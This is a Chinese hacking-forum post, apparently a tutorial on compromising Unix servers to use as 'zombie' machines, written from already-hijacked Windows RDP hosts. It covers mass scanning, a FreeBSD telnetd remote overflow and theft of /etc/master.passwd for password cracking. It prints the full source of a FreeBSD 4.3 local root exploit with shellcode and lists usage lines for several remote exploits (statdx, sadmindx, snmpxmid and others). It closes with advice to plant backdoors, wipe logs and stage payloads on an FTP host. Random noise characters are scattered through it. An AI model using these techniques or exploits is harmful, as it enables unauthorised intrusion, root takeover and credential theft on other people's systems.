- 在线时间
- 0 小时
- 最后登录
- 2007-9-23
- 注册时间
- 2004-9-10
- 听众数
- 3
- 收听数
- 0
- 能力
- 0 分
- 体力
- 9975 点
- 威望
- 7 点
- 阅读权限
- 150
- 积分
- 4048
- 相册
- 0
- 日志
- 0
- 记录
- 0
- 帖子
- 1893
- 主题
- 823
- 精华
- 2
- 分享
- 0
- 好友
- 0

我的地盘我做主
该用户从未签到
 |
今天的话题是怎么样找unix肉鸡,我想这对于一个有很多windows肉鸡而没有unix肉鸡的人是很有必要。
2 I4 v2 y# \, _" ?1 N不罗嗦,直入正题。为什么说是我和x-laser一起找肉鸡呢?因为我们的一切操作全部是在3389肉鸡上进行的。首先我们都上到同一个终端,(前提:终端是对方开的,而不是你自己做的,这样才有终端服务管理器可用)然后用管理工具中的终端管理进行id切换(选择用户进行连接)
" A4 _* z* w5 s+ B7 Y6 N/ e x, p' ]: J$ ?' ]
这样,两个人就可以互相控制对方了,一举一动都很清楚,这种方法很好,大大提高了效率,也增加了入侵时的乐趣。建议大家推广 :)
% y* s; W+ b: V, C/ Q, s- m 下面我们开始工作。由于是在win上搞unix类,所以我们最好要有在win上用的exploit,以得到第一台unix肉鸡。关于在win上用的exploits可以用cygwin编译(在www.isfocus.com)有下载。或者直接去大鹰的主页(e4gle.org)或者红客技术联盟(www.cnhonker.net/old.php)下载,注意了,要一起下那个cygwin1.dll的文件,不然搞不成。: _0 W+ A0 h* a% i D k5 ?
现在我们要做的是找出大量unix的肉鸡,然后再去找漏洞,但是怎么找呢?这时候,就请出了我们的languard network scanner,在做了简单的设置让他跑的快点后,我们就开始扫描3 c1 s8 _) T$ ~% s) i4 V% P& ^0 _
- q" s. p7 M3 x7 m' Y+ X3 Y9 _! d( d$ |* w6 E) u9 Q1 O4 [' ?# s6 k9 S
我们看到有一台freebsd,这个系统比较好欺负,因为前段时间有个沸沸扬扬的telnetd远程溢出漏洞。当然我们也可以用superscan来快速判断操作系统.我们用superscan扫23端口,因为telnet上去一般都有banner,从而得知操作系统类型.如下5 [% I6 A% F" H) k4 Z: `
! Z& B: Q( ]" ]我们扫到了两台linux,….. ..#..’是linux的判断符.$ j# i1 O% Y3 G) @1 b* X7 k1 G
……..#..’..$则是sunos的判断符,如此等等,大家用用就有经验了. D7 A" O; [' u7 K
6 N" i( P" M# U& s5 [9 e
, P" \" J: T4 |. K$ e; X# O
言归正转,来看我们的freebsd.我们在红盟下好bsd.exe和cygwin1.dll后,就开始溢出了。3 w" U8 H3 }8 g# W, ?" C$ `" ], S, \3 R
, T9 Q9 J0 C; K& l8 O
由于要发送16M的东西,所以可能会慢点' K# t I4 n% k: h, X
等到成功后,会出现 command ?
- b2 Z% }) {5 _: b0 r! g这是输入 id
) x/ v. X% e% v* @& D: d可以看到自己已经成为root了。当然,大家还可以把shadow抓下来,bsd下的sh( D% W, l5 \9 F8 l% b
adow文件是/etc/master.passwd,然后john跑个用户名出来(在www.xfocus.net有john的windows下的版本下载,也是用cygwin编译的),再telnet上去,就得到了普通帐号(因为root帐号一般比较难破),再进行本地溢出。为什么要这么麻烦呢?因为我们远程得到的shell很多都没有回显,所以不方便添加帐号。一般在bsd下添加帐号是在/usr/sbin下执行./adduser ,然后按着提示做就可以了,bsd系统很稳定,很多大型网站都是用这个建站,比如红盟。本地溢出的代码我在这里贴一下( c. l) c5 I3 V' l0 o
0 f7 B$ c" E" h9 W' ~1 y$ ]; l1 E. Q7 j
?受影响版本: FreeBSD 4.3 4.2 4.1 4.0 I, a6 ?1 K; `, I4 e5 J5 Z7 d
早期版本也许受影响 测试程序使用方法: </P>
3 A5 ~- J0 E; T7 S, Q' ^netdemon%gcc -o vvbsd vvbsd.c netdemon%cp /bin/sh /tmp netdemon%./vvbsd vvfreebsd. Written by Georgi Guninski shall jump to bfbffe71 child=61056 login: login: # done # </P>
( Q" ~; D \7 o, h; M$ S6 T发现 FreeBSD 4.3 存在一个设计上的漏洞,它允许用户在其它进程中插入 signal handlers。 </P>- C/ P8 q7 i3 L& l% I1 F* {. X# _
题出在 rfork(RFPROC|RFSIGSHARE) ,如果子进程 exec() 一个 setuid 程序,然后父进程设置一个 signal handlers,这个 signal handlers 将会在子进程中被复制。发送一个信号给子进程将能导致 signal handlers 被执行。 利用此漏洞,本地攻击者能取得 root 权限。 vvfreebsd.c ! z- B% ~: D- u* _, v; H- j. [6 N5 }
5 k5 k, p( F: x ???? /* FreeBSD 4.3 local root exploit using shared signals. Written by Georgi Guninski http://www.guninski.com */ #include <stdio.h> #include <signal.h> #include <unistd.h> int vv1; #define MYSIG SIGINT //exec "/tm9 g6 f5 b: m! _2 |) t
p/sh", shellcode gotten from the internet and modified unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x50\x50\xb0\xb7\xcd\x80" "\x31\xc0\x50\x50\xb0\x17\xcd\x80" "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" "\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53" "\xb0\x3b\x50\xcd\x80\x90\x90\x90"; typedef (*PROG)(); extern char **environ; int main(int ac,char **av) { int pid; //(*(PROG)bsdshell)(); if(!(vv1=getenv("vv"))) { setenv("vv",bsdshell,1); if(!execle(av[0],"vv",NULL,environ)) { perror("weird exec"); exit(1); } } printf("vvfreebsd. Written by Georgi Guninski\n"); printf("shall jump to %x\n",vv1); if(!(pid=rfork(RFPROC|RFSIGSHARE))) { printf("child=%d\n",getpid()); // /usr/bin/login and rlogin work for me. ping gives nonsuid shell // if(!execl("/usr/bin/rlogin","rlogin","localhost",0)) if(!execl("/usr/bin/login","login",0)) { perror("exec setuid failed"); exit(2); }; } sleep(2); signal(MYSIG,(sig_t)vv1); sleep(2); kill(pid,MYSIG); printf("done\n"
" E8 c. }! y: F); while(42); } </P>
& O& s. g8 C3 X' s. |0 F/* www.xcode.tw.st 极端网络安全小组 */
1 } K' i# [( g U: p" `8 k" r" ?1 H1 q5 |9 e
$ |( z3 W, I- X Z# Y0 N6 j
可以找到可写的地方,然后cat >vv.c 回车+ D1 A8 S+ X! H3 f6 p& g
(鼠标右健粘贴)
# N' A& B) b+ G; \ ~; s$ qctrl + d保存
/ ?# u n' X- s$gcc –o vv vv.c编译(gcc在solaris和aix等系统下叫做cc)
6 @8 U* h9 L& E3 |$ \/ P' |$cp /bin/csh /tmp
5 ^, E. W: e6 z2 j" c$./vv
& _; n3 v! k0 p2 L这样就执行了,一般可以得到root.注意第二句,这是代码的需要' ^; x% P* ^$ |4 Q& }0 m
然后就去adduser然后再放一堆后门上去吧+ k1 Z p2 m& E7 Q4 E
几点补充:1.命令w查看当前哪些在线,要是看见root就要小心了
' E1 p7 G4 @: h2( g5 V& P8 e' F4 z8 K7 T2 t
.Whereis gcc查看装了gcc没有,whereis的用法很灵活
, |+ V0 n- u j% p! Y% |3如果没装就需要把编译好的传上去,我们一般是申请一个ftp,然后编译好,传到ftp上,在让攻击的机子去下载(51.net的虚拟主机就可以完成这项任务)
2 W4 K& k6 R3 ~3 b4 L4记得每次上去要用wipe清理足迹,wipe在小凤居有下载& |! k u1 ^$ n( v* S5 G
</P>1 O! _" @2 b9 X; B
另外再附几种常见的exploit的用法' y6 ]' f7 o; s2 ]. V; P
# q$ j* v' l j0 V( H' K& w" l
$ x B$ c9 D2 W8 A目标主机一律用128.0.0.1代替! 1 statdu[vdp]redhat6.xrpc status远程溢出! </P>* b4 l0 `. C" L6 X1 y
溢出程序: statdx 用法: </P>" Y& d; e0 _1 u) u
./statdx -d 0 128.0.0.1或者 </P>
2 B' U. M9 b2 X) z) D. w% |: v./statdx -d 1 128.0.0.1或者 </P>
% U- L; t2 J; M) D8 }& V./statdx -d 2 128.0.0.1 </P>5 B5 }8 C5 Y4 O9 a/ F) L% ~1 V" d
2 sadmind[vdp]sun solaris sparc 2.6.2.7远程溢出 </P>
% s; ~$ z/ |5 C" S溢出程序: sadmindxbrute 用法 </P>/ N _3 M6 g1 R* r3 j6 H
./sadmindxbrute (主机类型参数) 128.0.0.1 主机参数 1 x86 2.6 2 x86 7.0 3 sparc 2.6 4 sparc 7.0 3 ttdb[tcp]sun solaris 2.3 2.4 2.5 2.5.12.6远程溢出 </P>, c1 o& F3 z/ h. H% x! f+ T$ a
所用程序 ttds(已经改名)流光iv的exploit内可以找到 </P>+ ?. c, e: X9 X& T9 \% o9 _* o7 a* P2 r6 P
用法: ./ttds 128.0.0.1 80(攻击断口设置为80)-v6 4 snmp[bdp]sun solaris sparc 7.0/8.8远程溢出 </P>$ a4 @4 }8 ^) [# n0 |
所用程序 snmpxmid </P>7 N: X. d2 Q) L$ C# H& S4 ^
用法: ./snmpxmid 128.0.0.1 -v 7 5 bind 远程溢出 </P>5 H, e: v/ {( Z( v
程序bind </P>5 n- n* x4 m7 _; d) Q" f t
用法: ./bind 128.0.0.1 -e 6 irix的telnet远程溢出(这个可能用流光iv扫描不到) </P>
9 x% t2 U, S, o# J$ Z: z' m所用程序telnetd </P>
; a u/ r- X- a+ T. m' P用法: ./telnetd 128.0.0.1 7 utofsd[vdp]bsd autofsd远程溢出,tcp 530 root shell </P>
" ~ t0 h8 y# P% a# ?0 d6 @所用程序 utofsd </P>9 P2 R9 @3 @. y
用法: ./utofsd 128.0.0.1 8 freebsd远程溢出 </P>
" ?. Z$ Y9 M- U* U! a! o" S这个可以通过www.paching.net/liumy写的bsd攻击程序在winnt下使用方法 bsd 128.0.0.1 其他的远程溢出程序也不麻烦 你只要把程序编译好之后输入 ./程序名 --h就可以看到帮助了!
3 c: v' L+ O4 z1 j" F% N8 f& h/ y( \, e
补充一点,很多写exploit的牛人为了让自己的exploit给真正的黑客用,故意在代码里放了几个错误,所以大家还是要学好编程的这样,就可以根据gcc编译器的错误提示把错误的代码改过来。今天我们讲了怎样找unix类肉鸡,当然还是要看运气,不过我和x-laser在3389肉鸡扫描很疯狂,用superscan一次一般是扫255个c段用languard也扫的很多,所以建议大家多多实践.最后,奉劝一句,不要入侵国内,不要搞破坏! </P> |
zan
|